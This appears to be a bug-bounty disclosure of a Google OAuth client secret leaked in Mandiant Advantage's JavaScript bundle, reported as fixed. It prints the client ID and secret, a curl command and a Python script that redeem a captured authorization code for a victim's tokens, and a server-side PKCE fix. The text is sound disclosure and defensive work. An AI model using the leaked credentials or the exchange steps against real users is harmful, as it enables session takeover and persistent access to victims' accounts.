
Vulnerability in Mandiant Advantage | Hardcoded Google OAuth Secret Enables Unauthorized Token Exchange

I discovered a vulnerability in the Mandiant Advantage platform that exposed the Google OAuth 2.0 client secret in the JavaScript delivered to the browser. Anyone holding that secret can complete the code-for-token exchange that only the application’s backend should be able to perform, so the leak enables full application impersonation and, given a captured authorization code, takeover of a victim’s session.

What Was the Vulnerability?

Mandiant Advantage is configured as a “Confidential Client,” meaning it relies on a private secret to authenticate itself to Google’s Identity Provider. However, this secret (a GOCSPX-prefixed Google client secret) was hardcoded directly into the client-side JavaScript bundle, which every visitor’s browser downloads.

Because the secret was public, any attacker could finalize the OAuth handshake that is normally reserved for the backend server. RFC 6749 (section 2.1) defines a confidential client as one capable of keeping its credentials private; once the secret is in the bundle that assumption, and the trust model between Mandiant and Google that rests on it, no longer holds.

Why Is This Dangerous?

  • Application Impersonation: The Google consent screen is driven by the public client_id, so anyone could already present a “Mandiant Advantage” consent page to a user; with the secret, the attacker can also redeem the authorization codes that page produces, so the impersonation is complete rather than stopping at the token endpoint.
  • Unauthorized Token Exchange: If an attacker obtains an authorization code issued to a victim (for example by intercepting the redirect that carries it), the leaked secret lets them exchange it for the victim’s Access Token and Refresh Token. Nothing else ties the code to the legitimate backend: the exchange below sends no PKCE code_verifier, so the code and the secret are all that is needed.
  • Persistent Access: The Refresh Token lets the attacker mint fresh Access Tokens until it is revoked, maintaining a session and interacting with Mandiant’s internal APIs (advantage-api.mandiant.com) as the victim.
  • Violation of OAuth Trust Model: It bypasses the server-side exchange requirement intended for confidential clients.

How to Reproduce the Issue

Below is the technical breakdown of how I verified the exploit and performed a manual token exchange.

1. Locate the Secret

View the page source of https://advantage.mandiant.com/ and find the configuration object in the frontend bundle. The REACT_APP_ prefix explains how the secret got there: Create React App inlines every REACT_APP_* environment variable into the built JavaScript at build time, so a secret assigned to such a variable ships to every browser:

REACT_APP_OAUTH_CLIENT_ID:"63027373284-ko4rclstem78bqj8uuq28k31racgvuc0.apps.googleusercontent.com",
REACT_APP_OAUTH_CLIENT_SECRET:"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", 
REACT_APP_OAUTH_REDIRECT_URI:"https://advantage.mandiant.com/accountmanagement/integrations"

2. Manual Token Exchange

I confirmed that this secret is functional and required by performing a manual exchange using a captured authorization code via the terminal:

# Exchange Request (using Leaked Secret)
curl -X POST https://oauth2.googleapis.com/token \
-d "code=<AUTHORIZATION_CODE>" \
-d "client_id=63027373284-ko4rclstem78bqj8uuq28k31racgvuc0.apps.googleusercontent.com" \
-d "client_secret=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" \
-d "grant_type=authorization_code" \
-d "redirect_uri=https://advantage.mandiant.com/accountmanagement/integrations"

Rigorous False Positive Verification

I confirmed that the Google Token Endpoint mandates this secret for the Mandiant Client ID via a negative test:

  • Request WITHOUT secret: Returns 400 Bad Request (client_secret is missing).
  • Request WITH secret: Returns 200 OK.

This proves the OAuth client is registered with Google as a confidential (“Web application”) client, so the token endpoint will not issue tokens without the secret, and the leak directly enables unauthorized token acquisition.
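As an added example (not code from the original post, and independent of Mandiant’s or Google’s code), the two reproduction steps above and the negative test can be scripted. The scanner looks for the GOCSPX- secret prefix, .apps.googleusercontent.com client IDs and any REACT_APP_*SECRET* key in a bundle; the request builder produces the same form the curl command sends, with or without client_secret. The sample bundle, client ID, secret and redirect URI are constructed stand-ins, not the real values shown on this page.

```python
"""Added example (not from the original post): scan a JavaScript bundle for a
leaked Google OAuth client secret, then build the same authorization_code
exchange the post performs with curl, with and without the secret for the
negative test.  All sample values below are constructed."""
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional, Tuple

TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"

# Google client secrets issued since 2021 start with GOCSPX-; web client IDs
# end in .apps.googleusercontent.com.
CLIENT_ID_RE = re.compile(r"\d+-[a-z0-9]+\.apps\.googleusercontent\.com")
SECRET_RE = re.compile(r"GOCSPX-[A-Za-z0-9_-]{20,}")
# Create React App inlines every REACT_APP_* variable into the bundle, so a
# key with SECRET in its name is a finding whatever format the value has.
ENV_KEY_RE = re.compile(r'(REACT_APP_[A-Z0-9_]*SECRET[A-Z0-9_]*)\s*:\s*"[^"]*"')

# Constructed stand-in for a minified bundle; mirrors the shape of the leak.
SAMPLE_BUNDLE = (
    'var e={REACT_APP_OAUTH_CLIENT_ID:"123456789012-abcdefghijklmnopqrstuvwxyz012345'
    '.apps.googleusercontent.com",'
    'REACT_APP_OAUTH_CLIENT_SECRET:"GOCSPX-ExampleNotARealSecret_0123456789",'
    'REACT_APP_OAUTH_REDIRECT_URI:"https://app.example.com/accountmanagement/integrations"};'
)


def scan_bundle(js: str) -> dict:
    """Return client IDs, GOCSPX- secrets and REACT_APP_*SECRET* keys found in js."""
    return {
        "client_ids": sorted(set(CLIENT_ID_RE.findall(js))),
        "secrets": sorted(set(SECRET_RE.findall(js))),
        "env_keys": sorted(set(ENV_KEY_RE.findall(js))),
    }


def build_token_request(code: str, client_id: str, redirect_uri: str,
                        client_secret: Optional[str] = None) -> dict:
    """Form body for the authorization_code grant.  Leave client_secret as
    None for the negative test: a confidential client gets a 400 back."""
    body = {
        "code": code,
        "client_id": client_id,
        "redirect_uri": redirect_uri,  # must match the URI the code was issued for
        "grant_type": "authorization_code",
    }
    if client_secret is not None:
        body["client_secret"] = client_secret
    return body


def exchange(body: dict) -> Tuple[int, str]:
    """POST body to Google's token endpoint; returns (HTTP status, response text).
    Live network call: a code is short-lived and cannot be reused once redeemed."""
    req = urllib.request.Request(
        TOKEN_ENDPOINT,
        data=urllib.parse.urlencode(body).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


if __name__ == "__main__":
    found = scan_bundle(SAMPLE_BUNDLE)
    print("findings:", found)
    # Negative test from the post, against a code captured from your own session:
    # for secret in (None, found["secrets"][0]):
    #     print(exchange(build_token_request("<AUTHORIZATION_CODE>", found["client_ids"][0],
    #                                        "https://app.example.com/accountmanagement/integrations",
    #                                        secret)))
```

Run it against a real target by feeding scan_bundle the text of each script the page loads; exchange is the only live network call and should only be pointed at a client you are authorised to test.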

Resolution and Fix

I reported this to the Google VRP, and it was marked as VERIFIED. Google has since fixed the vulnerability by rotating the compromised secret and moving the OAuth exchange logic to the server side, so the secret is no longer exposed to the client.
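The fix the post describes, moving the exchange to the server, looks roughly like the following. This is an added example, not Google’s or Mandiant’s implementation, and it goes beyond what the post reports of the fix by adding a state check and PKCE (RFC 7636), which addresses the intercepted-code scenario from the “Why Is This Dangerous?” section: the token endpoint will only redeem the code for the server that started the login. CLIENT_ID, REDIRECT_URI, the GOOGLE_OAUTH_CLIENT_SECRET variable name and the fake token endpoint used by run_flow are assumptions.

```python
"""Added example (not Google's or Mandiant's code): the exchange moved to the
server, where the client secret lives in an environment variable and the
browser only ever sees the authorization code.  PKCE and a state check go
beyond what the post reports of the fix; they bind the code to the session
that started the login, so an intercepted code alone is not redeemable.
CLIENT_ID, REDIRECT_URI and the env var name are constructed."""
import base64
import hashlib
import os
import secrets
import urllib.parse

AUTH_ENDPOINT = "https://accounts.google.com/o/oauth2/v2/auth"
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"
CLIENT_ID = "123456789012-example.apps.googleusercontent.com"   # public; may ship to the browser
REDIRECT_URI = "https://app.example.com/oauth/callback"          # must be registered with Google


def client_secret_from_env() -> str:
    """The secret is read on the server at request time; it is never built into a bundle."""
    try:
        return os.environ["GOOGLE_OAUTH_CLIENT_SECRET"]
    except KeyError:
        raise RuntimeError("GOOGLE_OAUTH_CLIENT_SECRET is not set on the server") from None


def pkce_challenge(verifier: str) -> str:
    """S256 code_challenge per RFC 7636: base64url(sha256(verifier)) without padding."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def begin_login(session: dict) -> str:
    """Server handler for GET /login: mint state and a PKCE verifier, keep both
    in the server-side session, and return the URL to redirect the browser to."""
    session["oauth_state"] = secrets.token_urlsafe(32)
    session["pkce_verifier"] = secrets.token_urlsafe(48)   # 64 chars, inside RFC 7636's 43..128
    params = {
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "response_type": "code",
        "scope": "openid email",
        "state": session["oauth_state"],
        "code_challenge": pkce_challenge(session["pkce_verifier"]),
        "code_challenge_method": "S256",
    }
    return AUTH_ENDPOINT + "?" + urllib.parse.urlencode(params)


def finish_login(session: dict, query: dict, client_secret: str, post) -> dict:
    """Server handler for the redirect URI.  `query` is the parsed callback
    query string; `post(url, form)` performs the HTTP POST and returns the
    parsed JSON.  State and verifier are single-use."""
    expected = session.pop("oauth_state", None)
    verifier = session.pop("pkce_verifier", None)
    if not expected or not verifier or not secrets.compare_digest(expected, query.get("state", "")):
        raise PermissionError("state mismatch: this code was not issued for this session")
    form = {
        "code": query["code"],
        "client_id": CLIENT_ID,
        "client_secret": client_secret,        # stays on the server
        "code_verifier": verifier,             # proves this server started the login
        "redirect_uri": REDIRECT_URI,
        "grant_type": "authorization_code",
    }
    return post(TOKEN_ENDPOINT, form)


def run_flow(tamper_state: bool = False) -> dict:
    """Drive both handlers with a fake token endpoint that echoes the form it
    received, so the body the server would send can be inspected offline."""
    session = {}
    begin_login(session)
    callback = {
        "state": "attacker-chosen" if tamper_state else session["oauth_state"],
        "code": "4/0A-constructed-code",
    }
    return finish_login(session, callback, client_secret="GOCSPX-constructed-not-real",
                        post=lambda url, form: form)


def rejects_foreign_state() -> bool:
    """True when a callback whose state was not minted for this session is refused."""
    try:
        run_flow(tamper_state=True)
    except PermissionError:
        return True
    return False
```

Wire begin_login and finish_login to the /login and callback routes of whatever framework the backend uses, back session with server-side storage, and pass client_secret_from_env() as client_secret; run_flow exists only so the request the server would send can be inspected without calling Google.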
